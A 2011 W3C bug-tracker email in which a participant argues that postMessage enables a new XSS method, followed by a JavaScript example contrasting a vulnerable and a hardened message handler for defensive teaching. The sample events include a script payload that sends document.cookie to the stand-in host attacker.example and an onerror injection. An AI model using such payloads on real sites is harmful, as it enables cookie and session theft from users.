- From: <bugzilla@jessica.w3.org>
- Date: Wed, 13 Apr 2011 00:14:08 +0000
- To: public-html-bugzilla@w3.org
http://www.w3.org/Bugs/Public/show_bug.cgi?id=12469

--- Comment #13 from Simon <simon.young90@live.com> 2011-04-13 00:14:06 UTC ---

Aryeh,

You have not provided any comparison to the quote from my comment. You have simply obscured the command document.write(''). Though your script could be injected into a webpage, it is not cross-site scripting but just plain old code injection. Besides, I have not mentioned obfuscation anywhere...

I will try to briefly define/rephrase the exploit for you. Perhaps then you can go back to the top and re-read it.

Prior to HTML5 and cross-document messaging, this method of cross-site scripting was not possible. By implementing XSS this way, you can make an exploit behave in a seemingly legitimate manner. What I mean by this, in loose terms, is: cross-document messaging is designed to behave this way, so in a stored attack (residing on the server and then being displayed to users) how do you distinguish between friend and foe?

This method of attack also provides the potential to legitimately use multiple files from the external domain, because the iFrame's content is of the same origin. Then, via the slave, the external domain can also legitimately access files belonging to the exploited domain by providing appropriate instruction.

In response to:

<quote>It isn't enough to just list how your attack is different from previous attacks. For the attack to actually be the fault of postMessage(), it has to be something where no equivalent attack can be performed without using postMessage(), which is just not the case here.</quote>

This is therefore a cross-site scripting attack which completely conforms to the same-origin policy. This was not possible before cross-document messaging, and at the very least it is a new way to implement an XSS attack.

Simon

-- 
Configure bugmail: http://www.w3.org/Bugs/Public/userprefs.cgi?tab=email
------- You are receiving this mail because: -------
You are the QA contact for the bug.
Received on Wednesday, 13 April 2011 00:14:11 UTC
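The pattern under dispute in this thread is a parent page whose "message" listener takes whatever arrives via postMessage() and feeds it to document.write(). The following is an added example, not code from the bug report or from either participant, showing that listener in its vulnerable form next to a hardened one, run against constructed message events outside a browser (the trusted origin "https://widgets.example", the attacker origin, the message shape {type, text} and the makeSink() stand-in for document.write are all assumptions made for this demo):

```javascript
// Added example (not from the W3C bug thread). Simulates a page-side
// window.addEventListener("message", ...) handler in isolation so the
// origin check and payload handling can be exercised without a browser.
// The origins and the {type, text} message shape are assumptions.

const TRUSTED_ORIGIN = "https://widgets.example"; // assumed embed origin

// Stand-in for the DOM sink the thread's exploit drives (document.write
// on the parent page). It only records what would have been written.
function makeSink() {
  const writes = [];
  return { write: (s) => writes.push(s), writes };
}

// Vulnerable pattern: the parent trusts any message event and writes the
// payload straight into the document. Any frame, opener or popup can
// postMessage() into this window, so attacker-supplied markup/script ends
// up executing under the parent's origin. postMessage() itself respects
// the same-origin policy; the bug is the receiver treating data as HTML.
function vulnerableHandler(sink) {
  return (event) => {
    sink.write(String(event.data));
  };
}

// Minimal HTML escaping so the payload is rendered as text, not parsed.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => ({
    "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;",
  })[c]);
}

// Hardened pattern: (1) compare event.origin against an exact allow-list,
// (2) require a structured message with an expected "type",
// (3) bound and escape the payload so it can only ever be data.
function hardenedHandler(sink, trustedOrigin = TRUSTED_ORIGIN) {
  return (event) => {
    if (event.origin !== trustedOrigin) return "rejected:origin";
    const msg = event.data;
    if (!msg || typeof msg !== "object" || msg.type !== "status") return "rejected:shape";
    if (typeof msg.text !== "string" || msg.text.length > 200) return "rejected:payload";
    sink.write(escapeHtml(msg.text));
    return "accepted";
  };
}

// Constructed sample events (not captured traffic). In a browser these
// would be MessageEvent objects delivered by the "message" listener.
const HOSTILE_EVENT = {
  origin: "https://attacker.example",
  data: "<script>location='https://attacker.example/?c='+document.cookie</script>",
};
const SPOOFED_SHAPE_EVENT = { origin: TRUSTED_ORIGIN, data: "<img src=x onerror=alert(1)>" };
const LEGIT_EVENT = { origin: TRUSTED_ORIGIN, data: { type: "status", text: "2 new <items>" } };

// Runs every sample event through both handlers and returns what each
// would have written plus the hardened handler's verdicts.
function demo() {
  const vSink = makeSink();
  const hSink = makeSink();
  const events = [HOSTILE_EVENT, SPOOFED_SHAPE_EVENT, LEGIT_EVENT];
  events.forEach(vulnerableHandler(vSink));
  const results = events.map(hardenedHandler(hSink));
  return { vulnerableWrites: vSink.writes, hardenedWrites: hSink.writes, results };
}

console.log(JSON.stringify(demo(), null, 2));
```

In a real page the hardened handler would be registered as window.addEventListener("message", hardenedHandler({ write: (s) => el.textContent += s })), and because the sink sets textContent rather than innerHTML or document.write, the escaping is belt-and-braces. The origin comparison must be an exact string match (scheme, host and port); a substring or prefix check lets "https://widgets.example.attacker.example" through.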